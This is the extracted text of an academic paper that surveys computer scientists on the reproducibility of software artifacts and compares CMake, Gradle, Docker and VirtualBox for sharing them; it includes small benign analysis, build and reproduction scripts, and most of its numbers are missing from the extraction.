concept with an execution system for linux systems, which also takes software installation and dependencies into account. docker (boettiger, ), which will be examined more closely in this article, provides an even more generic approach by utilizing virtualization for providing cross-platform portability. a tutorial for using docker to improve reproducibility in software and web engineering research was published in cito, ferme & gall ( ). reprozip by chirigati, shasha & freire ( ) provided a packing and unpacking mechanism for linux systems allowing the creation of a package from a computer experiment which can be unpacked on another target machine, including support for unpacking into a docker image. in contrast to the work presented above, our work focuses on the researchers’ requirements regarding reproducibility independent of the capabilities of individual tools. 
based on survey responses, we infer requirements and guidelines for making research reproducible and further analyze how different tools for packaging software artifacts comply with the researchers’ needs. we further identify limitations of current tools and raise awareness of researchers on the pros and cons of using different types of applications for making research reproducible. elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ survey in computer science, a large amount of research is backed up by prototypes, implementations of algorithms, benchmarking and evaluation tools, and data generated in the course of research. a critical factor for cutting edge research is to be able to build upon the results of other researchers or groups by extending their ideas, applying them to new domains or by reflecting them from a new angle. this is easily done with scientific publications, which are mostly available online. while the hypotheses, findings, models, processes, and equations are published, the data generated and the tools used for generating data and evaluating new approaches are sometimes only pointed out but have to be found elsewhere. our hypothesis in that direction is that there is a gap between scientific publishing on one hand and the publication of software artifacts and data for making results reproducible for other researchers on the other. in that sense, we created a survey asking researchers in the computer science field for their approach and opinion. methodology the survey design is driven by our research question rq (“to what extent is reproducibility of results based on software artifacts important in the field of computer science and in related research areas?”). the survey consists of five parts. first, basic demographic information, including the type of research, the area of research, the typical research contribution, and the type of organization the researchers are working for, is collected. second, the common practice of the researchers for publishing software artifacts and data is surveyed. third, we focus on the researchers’ expectations regarding the procedure of reproducing scientific results. fourth, we ask for opinions on integrating the question of reproducibility in the peer review process. finally, we collect additional thoughts with open questions. five-point likert scales are used to indicate the level of agreement in the survey. for questions where likert scales are not applicable, single-choice or multiple-choice questions (e.g., “what are the typical results of your research work?”), or numerical inputs without predefined range or categories (e.g., “how much time (in hours) are you willing to invest to make the results of a paper reproducible?”) are used. generally, we did not offer a “i don’t know” or similar option. for single-choice and multiple-choice questions we discussed the nominal scales based on related work as well as the authors’ experience. pilots with people neither involved with the questionnaire nor taking part in the final survey were conducted to reduce the chance of leaving out important options. for the sake of completeness, custom values are allowed in addition to the given options, to allow researchers to report on their practice. open-ended questions are only used where other types of questions might limit the spectrum of answers. 
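the numeric coding of these likert items is what later allows quantitative treatment, for example the rank correlations reported in the section "correlation analysis". purely as an illustration (this is not the authors' analysis script; the file name, column names, and the 1-5 coding are assumptions), such an analysis could proceed along these lines:

import pandas as pd
from scipy.stats import spearmanr

# hypothetical file and column names; likert answers are assumed to be coded
# numerically as strongly disagree = 1 ... strongly agree = 5
responses = pd.read_csv("survey_responses.csv")
col_a = "checking_reproducibility_should_be_part_of_peer_review"
col_b = "willing_to_check_results_as_reviewer"

# spearman's rank correlation is suitable for ordinal (likert) data;
# it yields the coefficient rho and a p-value for each pair of questions
rho, p_value = spearmanr(responses[col_a], responses[col_b])
print(f"rho = {rho:.2f}, p = {p_value:.3g}")

pairs of questions whose coefficient exceeds a chosen threshold would then be the ones worth reporting.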
the survey was set up as an anonymous online survey, with no partial answers allowed as all questions were mandatory and only the final submission at the end of the survey would save the results. the survey was distributed via a scientific mailing lists and via personal contacts with the request to distribute the survey among colleagues . the full survey and all responses are included in the supplemental material. the online survey was distributed on the following channels: information-centric networking research group discussion list (https://www.irtf.org/mailman/ listinfo/icnrg); the google group comp. simulation (https://groups.google.com/ forum/#!forum/comp.simulation); the authors’ facebook and twitter profiles; and via personal contacts. elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information https://www.irtf.org/mailman/listinfo/icnrg https://www.irtf.org/mailman/listinfo/icnrg https://groups.google.com/forum/#!forum/comp.simulation https://groups.google.com/forum/#!forum/comp.simulation http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ demographics in total, we received responses, mostly from academic researchers. the demographics of survey participants are visualized in fig. . seventy-four out of the participants were working or studying at a university and of of research institutes. thirteen participants noted that they were mainly working for a company, two were private researchers, one from a school. with their position, % of the participants were phd students, % were professors or group leaders, % worked as researchers within a project, % were principal investigators, and % were bachelor or master students at the time of the study. three participants were heads of departments or organizations, and two participants indicated that they were postdoctoral researchers. computer science or computer engineering was the area of research for % of the participants. regarding the area of research, . % of the participants came from electrical engineering, % from information systems, . % from (applied) mathematics, and . % from simulation. furthermore, singular mentions were applied informatics, ciencias sociales, computational biology, computational biology/numerical simulations, computer networks, data analysis, economics, management, materials science, mathematical modeling, medical informatics, physics, scientific computing, and user experience. the population also includes researchers for whom publishing software is common practice; % of the participants have indicated that they have not published any software artifact at the time of the study. survey result summary four aspects of the survey responses are analyzed. first, the relevance of reproducibility for the research community is analyzed. second, we investigate what people are willing to do in order to achieve reproducible research. third, we discuss the researchers’ opinions on reproducibility in the peer review process. finally, we highlight concerns regarding sharing scientific software artifacts. figure summarizes the responses to questions showing the relevance of reproducibility in research. as can be seen, the majority of people wants to reproduce results from other researchers or groups: of indicated agreement. even more ( out of ) considered reproducible results as added value for research papers. 
it can number of responses other head of department / organisation bachelor or master student principal investigator researcher employed in a project professor / group leader phd student (a) positions number of responses other information systems electrical engineering computer engineering computer science (b) area or research number of responses school i'm a private researcher company research institute university (c) research environment figure demographics of the survey participants including positions (a), area of research (b) and research environment (c). for presentation reasons, categories with less than three researchers were summarized as “other” in (a) and (b). full-size doi: . /peerj-cs. /fig- elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ be seen that the majority of researchers ( out of ) wants to build their research on the work of others, which requires others to share scientific artifacts. it can be seen from the researchers’ demographics in fig. that the relevance of reproducibility is independent of a researcher’s position, research area, and research environment. the results of the question “i want to reproduce the results of other researchers or groups from their original work (software tools or libraries) to compare it to my work” were grouped by position, research area, and research environment. these distributions look very similar for all questions from fig. . a full collection of graphical illustrations of these distributions is included in the supplemental material of the paper. an open-ended question asking why software artifacts should be published yielded diverse answers. the most frequent answers were improvements in credibility and reliability of results, building trust, and improving understanding of the results of others. besides, answers included the benefit of a practical approach by fostering task-based research, increasing visibility for your research by making tools available and open communication to foster research in general. after showing the researchers’ interests in reproducibility, which are aligned with the results from other published surveys, we now evaluate what researchers are willing to do to make their results reproducible for others and how much effort they are willing to invest to reproduce the results of others. focusing on fig. , we see that about half of the researchers typically try to reproduce the results of others by running their tools ( out of ). this again shows the demand for publishing scientific software artifacts. the average amount of time participants would invest in making software of others work to reproduce results was . hours, neglecting two outliers who would spend and strongly agree agree neutral disagree strongly disagree published software artifacts are added value to the published text in the research paper. i want to reproduce the results of other researchers or groups from their original work (software tools or libraries) to compare it to my work. i want to build my research tools by extending on the work (software, tools, or frameworks) of other researchers or groups. figure responses to questions focusing on the general relevance of reproducibility. full-size doi: . /peerj-cs. 
/fig- strongly agree agree neutral disagree strongly disagree (a) position all responses other professor / group leader principal investigator researcher employed in a project phd student bachelor or master student (b) area of research all responses other electrical engineering computer engineering computer science (c) research environment all responses other company research institute university figure responses to the question “i want to reproduce the results of other researchers or groups from their original work (software tools or libraries) to compare it to my work.” grouped by researchers’ positions (a), research area (b) and research environment (c). full-size doi: . /peerj-cs. /fig- elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ or more hours . the responses to the corresponding survey questions are visualized in fig. a. two participants noted that they would invest more than a month of work time (> h) to reproduce results of others, participants noted that they would invest between a week and a month ( – h), participants would invest up to a week, but less than a day ( – h), would invest up to a day of work ( – h) and only three participants would not invest any time at all. most researchers agreed they would like to publish their software to aid reproducibility. the question of whether researchers want to publish their software tools to allow others to reproduce their results was answered with agreement from the majority of researchers ( out of ) with only disagreeing. when publishing software, out of researchers intend to provide detailed documentation on how to install and run the published software artifact. the question of how many hours researchers want to invest in making their results reproducible led to an average of . hours. we excluded three outliers with answers of , , , and hours as we agreed that the answer of , hours—in other words work weeks—and more is more likely to be a misunderstanding of the question and may include the original research work in addition to the extra work of making the results reproducible. the results can be seen in fig. b. summarizing the results in clusters results in two participants investing more than a month of work time (> h), seven participants would invest up to a month ( – h), participants indicating they would invest up to week of work time ( – h), participants reporting to invest up to a day ( – h), and only four indicating that they would not invest any time. interpreting these numbers, we see that researchers are willing to invest more time to make their own research reproducible than to reproduce the results of others. strongly agree agree neutral disagree strongly disagree i typically try to reproduce the research results of other groups or researchers by installing and running their tools. when i publish software i intend to provide detailed documentation on how to install and run the software. i want to publish software tools an methods from my research to allow others to reproduce my results figure responses to questions focusing on what researchers are willing to do to achieve reproducible results or to share artifacts. full-size doi: . /peerj-cs. 
/fig- responses ranked by value ti m e [h ] a) how much time (in hours) are you willing to invest into reproducing a result or get the software tools of others installed and running? responses ranked by value ti m e [h ] b) how much time (in hours) are you willing to invest to make the results of a paper reproducible? responses ranked by value ti m e [y ea rs ] c) how long (in years) do you think software for reproducing research results should be runnable / compilable / available? a b c figure responses to the above questions on how much hours researcher would invest into reproducing (a) and making reproducible (b) as well as how many years result should be reproducible (c). note that the y-axis is logarithmic. full-size doi: . /peerj-cs. /fig- using the range of mean ± times standard deviation for outlier detection elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the results of a multiple-choice question asking for the typical composition of research results shows that software implementations and datasets are already common artifacts of today’s research, indicating the potential utility of making research reproducible. besides results in written form— researchers mentioned published papers and participants reports with detailed results—a software implementation is part of the research results for participants and participants mentioned a dataset being part of their results. another important aspect for reproducible research is the long-term availability of results and artifacts. the effort of preparing and publishing software artifacts and results would ultimately be in vain if the artifacts later become inaccessible. participants were asked about their opinion on how long results and necessary software artifacts should be available after initial publication. the results can be seen in fig. c. with the exception of five outliers (with seven answers of for not supporting reproducibility at all, as well as , , and years, which is too long a time for all currently known digital storage media to survive), the participants stated that software for reproducing results should be available for an average of . years. summarizing through clusters participants stated it should be from . to years, indicated it should be – years, state – years, and nine think it should be more than years available. asked about how they share research artifacts or make results reproducible, out of participants stated to have already published software at the time of their participation in the survey. means of making their results reproducible were—multiple means could be specified—detailed instructions ( ), make scripts ( ), installation scripts ( ), virtualization software ( ), and container frameworks ( ). there were two mentions of hosting web front ends as means of making results available and three mentions of public source code repositories as platforms for distribution. now that we are aware of current practices for making results reproducible, we focus on the role of reproducibility in the peer review process. our assumption is that testing for reproducibility during the peer review process could enhance the credibility of published results and thereby increase the quality of a paper. this opinion is shared by the survey participants as visualized in fig. 
: a total of out of participants stated that checking for reproducibility should be part of the peer review process. furthermore, out of participants would be willing to check results in addition to the traditional peer review process. here, differences among different positions and research areas can be found (see fig. ). when focusing on the researchers’ position, nine out of bachelor or master students showed agreement, with none indicating disagreement. principal investigators indicated the lowest agreement. differences can also be seen regarding different research areas. researchers from computer engineering showed the least agreement, whereas electrical strongly agree agree neutral disagree strongly disagree checking for reproducibility of research results should be part of a peer review process. as a reviewer i would be willing to check research results in addition to the traditional peer review. figure responses on questions focusing on the role of reproducibility in the peer review process. full-size doi: . /peerj-cs. /fig- elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ engineers indicated the most agreement. researchers from other research areas, including computer science, indicated a similar interest. no differences between different research environments were identified. when analyzing the survey results on the researchers’ concerns regarding publishing scientific software artifacts, we can see that the traditional payment models of scientific publishers used for research papers are seen as critical for publishing software artifacts. figure shows that out of researchers indicate that their results can be reproduced with free and open source software. this goes hand in hand with researchers’ reluctance to pay for publishing or accessing software artifacts. only out of researchers are willing to pay for making software tools, frameworks, and subsequently their results to be available to other researchers. a few more, but still only out of researchers indicate agreement with paying for being able to reproduce the results of others. these responses indicate the importance of possibilities for sharing software artifacts free of charge regardless of the platform. moreover, even researchers willing to pay for software, might face problems due to closed-source components or other limitations. continuing in this vein, we asked why results cannot be reproduced using open source tools. a total of participants indicated the use of paid-for programming language environments, the use of licensed operating systems, the use of copyrighted materials, and the use of commercial tools. computer security, when installing programs from others, is not a major concern for out of participants, which is alarming when reflecting on possible security issues. an explanation could be that the researchers’ awareness is low because they themselves would not harm others and believe others to be benevolent as well. 
however, this mindset does not account for security issues that do not originate from other researchers, but from strongly agree agree neutral disagree strongly disagree (a) position all responses other professor / group leader principal investigator researcher employed in a project phd student bachelor or master student (b) area of research all responses other electrical engineering computer engineering computer science (c) research environment all responses other company research institute university figure responses to the question “as a reviewer i would be willing to check research results in addition to the traditional peer review.” grouped by the researchers’ position (a), research area (b) and research environment (c). full-size doi: . /peerj-cs. /fig- strongly agree agree neutral disagree strongly disagree is it possible to reproduce your research results with fre e and open source software? i am willing to pay for open access to my research software tools and frameworks to make them available to other researchers. i am willing to pay for easily accessible software tools and for being able to reproduce the results of other researchers. local computer security and local data security is a major concern for me when installing and running software from other researchers. figure responses to questions focusing on additional concerns when publishing scientific artifacts. full-size doi: . /peerj-cs. /fig- elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ used third-party libraries. therefore, software from unknown sources, or with unknown dependencies, should always be handled with care. we further see that security awareness depends on the researchers’ position (see fig. ). undergraduate and master students indicate the highest awareness of security risks, while professors and principal investigators the lowest. a possible interpretation is that researchers in higher positions neglect security issues because of the high pressure to progress research. students, in contrast, focus on smaller tasks and complete them more carefully. regarding security awareness across different research areas, computer engineers have the highest awareness with out of researchers indicating agreement on the question “local computer security and local data security is a major concern for me when installing and running software from other researchers.” for other fields, the awareness or lack thereof is almost equally low. besides economical and security concerns, we also asked researchers about additional reservations. a multiple-choice question on major concerns showed that when installing and running software from other researchers the ease of installation is a prominent topic. this questions allowed for multiple choice as well as an other option, where participants could voice their concerns. answers included: � ease of the installation (without major barriers) ( mentions), � hardware requirements like computation power, memory, or specialized equipment ( mentions), � license issues ( mentions), � size of the download and installation ( mentions), � used harddisk space after installation (two mentions), � i don’t see additional concerns (eight mentions), � other (with the option of giving text here). 
five other answers were entered: � “i am sure it does not run on the first try nine out of times,” � “external dependencies and their updateability/patchability in case of security fixes (should never depend on the initial publisher for third party libraries because they’d strongly agree agree neutral disagree strongly disagree (a) position all responses other professor / group leader principal investigator researcher employed in a project phd student bachelor or master student (b) area of research all responses other electrical engineering computer engineering computer science (c) research environment all responses other company research institute university figure responses to the question “local computer security and local data security is a major concern for me when installing and running software from other researchers.” grouped by the researchers’ position (a), research area (b) and research environment (c). full-size doi: . /peerj-cs. /fig- elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ have to maintain their old packages for a long time); also important: downards (sic!) compatibility of “new” versions with old data & tools,” � “analytical reporoducability (sic!) & mathematical clarity (or correctness) is my main concern,” � “conflicting versions of additional required software,” � “complex build dependencies.” a final open-ended question was about reservations toward publishing data and software: “i have reservations for publishing software artifacts and data in research because ...” for analysis following the approach of open coding the answers were labeled manually by the authors and the assigned labels were discussed until agreement was reached. the most common cluster of answers noted legal or privacy issues ( ). others pointed out the additional effort needed ( ), commercial interests ( ), missing reward or support for doing so ( ), and that publishing artifacts is not part of the job, that is, not supported by the group or organization ( ) . regarding the aforementioned legal issues, it would be an interesting hypothesis that researchers would be more willing to share if legal issues and efforts are reduced. this may be achieved by license constraints (only licenses others can build upon) or exceptions for publishing research (leaving license issues aside for research by general agreement). correlation analysis given the likert scales for the answers we did investigate the correlation (spearman’s rank correlation) between answers to see if (i) intuitive and expected correlations exist and (ii) new and surprising correlations can be found. table shows all correlations with jρj > . . the strongest correlation to be found with a coefficient of ρ = . and a p-value < . was between the questions “checking for reproducibility of research results should be part of a peer review process” and “as a reviewer i would be willing to check research results in addition to the traditional peer review.” hence, people who stated to be willing to do reproducibility checks were more likely to find the idea of a review process with mandatory reproducibility checks attractive. another strong correlation (ρ = . , p < . 
) was found between the questions “how much time (in hours) are you willing to invest into reproducing a result or get the software tools of others installed and running?” and “how much time (in hours) are you willing to invest to make the results of a paper reproducible?” with that correlation one can hypothesize that researchers with reproducibility in mind invest time in reproducing results as well as making their results reproducible. a less strong but still rather interesting correlation (ρ = . , p < . ) was found between “i am willing to pay for open access to my research software tools and frameworks to make them available to other researchers.” and “i am willing to pay for easily accessible software tools and for being able to reproduce results of other researchers.” so with the overhead of participants not willing to pay for access and publishing of in context of reproducibility as indicated in fig. , it is likely that researchers either like the idea of either paying for both, publishing and access, or none. the raw data with all the responses is included in the supplemental material. correlations of jρj < . are generally considered as poor or weak correlations and hence not included in the table. elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ threats to validity while a minor bias is assumed to be caused by the study’s title as participants may have been attracted by the title if they could identify with the topic of reproducibility, it is still valid to discuss the implications of the findings. one possible limitation of the survey is the missing geographical distribution of the participants. we did not include questions on where participants are located or work primarily, and did not collect ip addresses. hence, we cannot conclude if the survey result indicates a global trend, or if the preferences of researchers from different geographic regions differ. similarly, a possible gender gap of the survey’s participants can not be evaluated. for single and multiple choice questions with a pre-defined answer set in the survey, the set of answers can introduce a certain bias to the results. therefore, it was decided to avoid such questions if the risk of bias was high. in that sense, we also avoided quantizing numeric input, for example, the hours people spend making their work reproducible. if it was necessary, we always included an open-ended answer option. the pilot, survey of related work, and critical reflection by the authors were used as tools to minimize the bias. in one single case, that is, the question “which of the following are table correlations in the survey answers with jρj > . using spearman’s rank correlation. questions ρ p-value checking for reproducibility of research results should be part of a peer review process. . < . as a reviewer i would be willing to check research results in addition to the traditional peer review. how much time (in hours) are you willing to invest into reproducing a result or get the software tools of others installed and running? . < . how much time (in hours) are you willing to invest to make the results of a paper reproducible? i am willing to pay for open access to my research software tools and frameworks to make them available to other researchers. . < . i am willing to pay for easily accessible software tools and for being able to reproduce results of other researchers. 
i want to publish software tools and methods from my research to allow others to reproduce my results. . < . when i publish software i intend to provide detailed documentation on how to install and run the software. i want to reproduce the results of other researchers or groups from their original work (software tools or libraries) to compare it to my work. . < . i want to build my research tools by extending on the work (software, tools or frameworks) of other researchers or groups. i want to reproduce the results of other researchers or groups from their original work (software tools or libraries) to compare it to my work. . < . i typically try to reproduce the research results of other groups or researchers by installing and running their tools. when i publish software i intend to provide detailed documentation on how to install and run the software. . < . i want to build my research tools by extending on the work (software, tools or frameworks) of other researchers or groups. when i publish software i intend to provide detailed documentation on how to install and run the software. . < . i typically try to reproduce the research results of other groups or researchers by installing and running their tools. published software artifacts are added value to the published text in the research paper. . < . i want to build my research tools by extending on the work (software, tools or frameworks) of other researchers or groups. elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional concerns when installing and running software from other researchers?” the open-ended answer option showed that at least one pre-determined answer was missing. several participants noted complex build dependencies (also mentioned as conflicting versions of additional required libraries or external dependencies) are likely to be another major concern. participants could have had overlaps in the categorization of positions, for example a person could be a phd student and an employed researcher in a project at the same time. in this case participants might have selected the category randomly or selected the category they appreciate more. despite this, as long as no intentional or unintentional mistakes are made in the answers, each category will contain samples that are member of this category. the survey also includes bachelor and master students, where it is not guaranteed that they are involved in research projects. however, due to the dissemination channels we used for advertising the survey, we assume that the participants are invested in research and reproducibility. this is supported by the study where nine out of bachelor or master students indicate to have already published software artifacts. english as the only language for the survey might be a further limitation. nevertheless, english is the working language of the target audience, and consequently, we assume the influence by the survey language to be negligible. requirements and general guidelines the survey results indicate that a majority of researchers of all levels consider reproducibility as very relevant. there is further a strong interest in doing work to make one’s own results reproducible, a strong interest to use results of others for comparison to own work, and to some extent, a motivation to try to reproduce work for review purposes. 
to achieve this, it is necessary to make all information that is necessary to reproduce the results available together with a publication. additionally, the effort necessary to reproduce the results needs to match the value of doing the work. work reproducing or refuting previous results is overall much less appreciated than original work, so the effort a researcher is willing to invest in order to reproduce previous results is much lower than the effort they are willing to put in to produce new work. on the other hand, when planning to build own research on top of other results the investment can be higher. the most critical case is in reviewing, when reproducibility is intended to be checked as part of the reviewing process. reviewers have a strict timeline to perform their review, so there is a need for a straightforward, mostly automated process to reproduce results. moreover, despite contributing to verifying the results of a paper, reviewers are not mentioned in connection with the work. as reviewers work voluntarily, they are probably the least motivated to reproduce results. moreover, in our study researchers have responded critically to commercial systems introducing payments, either from the publishing researcher side or from the consumer side. a majority of participants also name security as a concern in this context, which highlights an issue to be addressed for researchers being security-aware as well as for those who are less concerned about security. elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in order to address these issues, the following guidelines are proposed: � code, data, and information on how to conduct an experiment should be gathered in a single place (a single container), which can be found in connection with the paper. � the reproduction process should be highly automated (for example by an easy to handle build and execution script). � to address security issues, the published artifacts should be provided as source code and scripts allowing for running the code in a virtual environment should be provided. � commercial libraries and other components that require reviewers to pay for access should be avoided. � since research papers tend to create some interest even long after they have been published, it is necessary to ensure that software and environment for the reproduction process remain available, either by packing all necessary components into a container or by referring to well-archived open source tools. � the time and necessary information to reproduce results should be tested with an independent person. unless the size of the project requires it, the reproduction process should take at most days. existing tools most tools for sharing software artifacts are also used in the development of software artifacts. these could be either tools for simple tasks such as compiling software projects, but also more complex tools for tasks such as automated dependency installation and software packaging. to prevent unnecessarily complex configuration, it is wise to select tools based upon the complexity of the software artifact. software artifacts which are complex to run require more sophisticated tools with high levels of abstraction, whereas simple artifacts do not require complex tools to run. 
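to make the idea of a "straightforward, mostly automated process" more concrete before turning to the guidelines below, a repository could ship a single driver script along the following lines; this is a hypothetical sketch (the file names, image name, and expected checksum are placeholders, not artifacts of this study), which delegates the actual execution to a container so that the reviewer's host system stays isolated:

#!/usr/bin/env python3
# minimal reproduction driver: build the experiment image, run it, and report
# a checksum of the produced output so it can be compared with the published one.
import hashlib
import subprocess
import sys
from pathlib import Path

EXPECTED_SHA256 = "<checksum reported with the paper>"  # placeholder

def run(cmd):
    # echo each command and fail fast, so a reviewer immediately sees what went wrong
    print("+", " ".join(cmd))
    subprocess.run(cmd, check=True)

def main():
    out_dir = Path("out")
    out_dir.mkdir(exist_ok=True)
    run(["docker", "build", "-t", "paper-experiment", "."])        # assumes a dockerfile in the repository
    run(["docker", "run", "--rm",
         "-v", f"{out_dir.resolve()}:/out", "paper-experiment"])    # the container writes its results to /out
    digest = hashlib.sha256((out_dir / "results.csv").read_bytes()).hexdigest()
    print("sha256 of out/results.csv:", digest)
    if digest != EXPECTED_SHA256:
        sys.exit("note: output differs from the checksum published with the paper")

if __name__ == "__main__":
    main()

such a script gives reviewers a single automated entry point, relies only on freely available tooling, and isolates the executed code from the local system, which speaks to the review-time, cost, and security concerns raised above.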
in this section, we tackle our second research question by presenting four open source tools for sharing software artifacts, ranging from tools for compiling simple artifacts to sophisticated frameworks for sharing self-contained software environments. the tools have been selected, despite their different scopes, because of their potential to support reproducible research. it has to be noted that a complex project might even incorporate multiple tools, for example a build system within a virtual environment. we begin with a discussion of simple tools, such as cmake, which are used for build management, and continue by discussing tools that utilize a higher level of abstraction. for discussion purposes, well-known tools, each representing a class of tools with similar functionality, were selected. the discussed pros and cons are valid not only for the discussed tool itself, but for the complete class represented by the tool. finally, we summarize the features of the different tools and discuss the importance of their benefits, according to the survey results presented in the section “survey”. cmake cmake is a cross-platform build tool based on c++. it is designed to be used with native build environments such as make. platform-independent build files are used to generate compiler-specific build instructions, which define the actual build process. main features of cmake are tools for testing, building, and packaging software, as well as support for hierarchical structures, automatic dependency resolution, and parallel builds. one drawback of cmake and similar build management systems is that required libraries or other dependencies of software artifacts must be available and installed in the required version on the host system in order to successfully build the project. this can lead to extensive preparation for a build, which is mandatory for executing the software artifact. cmake has been chosen for discussion because it is one of the most widely used tools of this type. tools with similar functionality are configure scripts, the gnu build system, and the waf build automation system. gradle gradle is a general-purpose build tool based on java and groovy. gradle integrates the build tools maven as well as ant and can replace or extend both systems. main features of gradle are the support for maven repositories for dependency resolution and installation and the out-of-the-box support for common tasks, that is, building, packaging, and reporting. gradle supports multiple programming languages, but has a strong focus on java, especially as it is the recommended build system for android development. an integrated wrapper system allows using gradle to build software artifacts without installing gradle itself. dependency installations and versions are maintained automatically. if a build requires a new version of a library, it is downloaded and installed automatically. the automated dependency installation is a great benefit of gradle, although there are still some challenges to overcome. one issue is that automated dependency installation only works if the required libraries are offered in an online repository. if a required dependency is removed from the online repository, building any software that depends on this library becomes impossible.
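as an illustration of the dependency handling described above, a minimal gradle build file for a java project might look as follows. the plugin, repository, dependency coordinates, and main class are generic examples chosen for illustration; they are not taken from the projects discussed later in this article.

```groovy
// build.gradle -- minimal sketch of a java project with automatically resolved dependencies
plugins {
    id 'java'
    id 'application'
}

repositories {
    // online repository used for automatic dependency resolution
    mavenCentral()
}

dependencies {
    // example third-party library and test dependency
    implementation 'com.google.code.gson:gson:2.10.1'
    testImplementation 'junit:junit:4.13.2'
}

application {
    // hypothetical entry point of the artifact
    mainClass = 'org.example.Main'
}
```

with the gradle wrapper committed to the repository, a command such as ./gradlew build downloads the declared dependencies and builds the artifact without a locally installed gradle.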
for other programming languages, tools with similar functionality are available, that is, the node package manager for javascript projects or pip for python projects. docker the open source software docker allows packaging software applications including code, system tools, and system libraries into a single docker image. the resulting image can be published, downloaded and executed on various systems without operating system restrictions in a virtualized environment. this way, an application embedded in a docker image will execute in a predefined way, independent of the software environment installed on the host computer. the only requirement for the host system is the installed docker engine. a docker image is a kind of lightweight virtual machine image. it could contain the runtime environment for a single application with or without graphical user interface, but it could also contain a ready to deploy server application for web services or even environments for heavy calculations or simulations. when running the docker image, a docker container is launched. a docker container can be seen as an isolated runtime elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ environment, which uses the kernel of the host operating system and thereby becomes more lightweight than traditional virtual machines. a running docker container can be accessed via a terminal or a graphical user interface allowing for a broad range of applications. docker images can be shared in two different ways. the first way is to export a running container including all files and executables as image and to share it as a single file. this file can be large in size but is fast to launch by others. the second way is to create a so-called dockerfile. dockerfiles contain the building instructions for docker images. these instructions include commands for installing required dependencies and for installing the shared software artifact itself. when building a docker image from a dockerfile, all instructions from the dockerfile are automatically executed. this leads to a small dockerfiles, but a more complex import process. in addition, when using dockerfiles, all dependencies need to be available either in online repositories, or locally on the machine building the image. the commercial docker hub platform (https://hub.docker.com/, last visited - - ) streamlines the process for sharing docker images. docker provides tools to share images on docker hub and to download images from docker hub via the command-line. docker hub offers the possibility of sharing public docker images without download restrictions for free, but also paid plans allowing creating private repositories for sharing images among small groups. the major difference between docker and the previously presented tools is that docker is not usually used for the development of an artifact. in most cases, a docker image is created for sharing a predefined environment in a team. this means that the image is created and the software artifact is deployed in the container afterward. an alternative to docker is using linux containers, which allow to run multiple isolated linux systems on a single host. virtualbox virtualbox is an open source software for the virtualization of an entire operating system. virtualbox emulates a predefined hardware environment, where multiple operation systems, like windows, mac os, and most unix systems can be installed. 
the installed operating system is stored as persistent image, which allows the installation and configuration of software. once the image is created, it can be shared and executed on multiple machines. as mentioned before, virtualbox emulates the entire hardware of a computer resulting in higher execution overhead as well as higher setup effort. before the scientific software artifact can be installed in a virtualbox container, an operating system and all dependencies have to be installed. a non-open source alternative to virtualbox is vmware, which has similar functionality. comparison of analyzed tools after the presentation of selected tools in the last section, we now want to compare their features for sharing scientific software artifacts. as criteria for the comparison, we focus in this section on important aspects of software for researchers, according to the survey elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://hub.docker.com/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ presented in the section “survey”. table briefly summarizes our findings; a description of each criteria is found throughout this section. the ratings in table are based on qualitative comparisons, as well as on our experience from using the tools for making three different research projects reproducible, as elaborated in the section “examples”. security as indicated by the survey, local computer and data security is a major concern for many researchers. some software artifacts require administrator access rights on the local machine in order to be executed. these access rights allow malicious behavior, which could lead to unwanted consequences on the local machine or on the local network. virtualbox and docker execute software artifacts in sandboxed environments and therefore allow the secure execution of software artifacts. tools like cmake and gradle do not offer this security mechanism. when executing a shared software artifact from untrusted sources, a sandboxed environment is recommended. supported platforms cmake, docker, and virtualbox are compatible with most linux platforms, recent versions of macos, and selected versions of windows . gradle works as long as the java virtual machine is available. besides this platform support it has to be kept in mind that the software artifacts itself could require a certain operating system. this problem can be mitigated through virtualization of docker and virtualbox. required knowledge for sharing if a build management tool is used in the development of a scientific software artifact, we assume that the researchers are familiarized with the build management tool during the development phase. therefore, no additional knowledge for the researcher who is sharing the artifact is required. virtualbox also does not require a lot of additional background information. everybody who is able to install an operating system is able to share a software artifact embedded in a virtualbox image. the terminology of docker seems to be confusing at first glance, requiring some time to become familiar with docker concepts. table comparison of tools for sharing scientific software artifacts. 
tool: cmake | gradle | docker | virtualbox
security: no security mechanisms | no security mechanisms | sandboxed environment | sandboxed environment
supported platforms: linux, macos, windows | java vm | linux, macos, windows | linux, macos, windows
required knowledge for sharing: little | little | moderate | little
effort for sharing: little | little | moderate | high
required knowledge for installation and execution: moderate | moderate | little | little
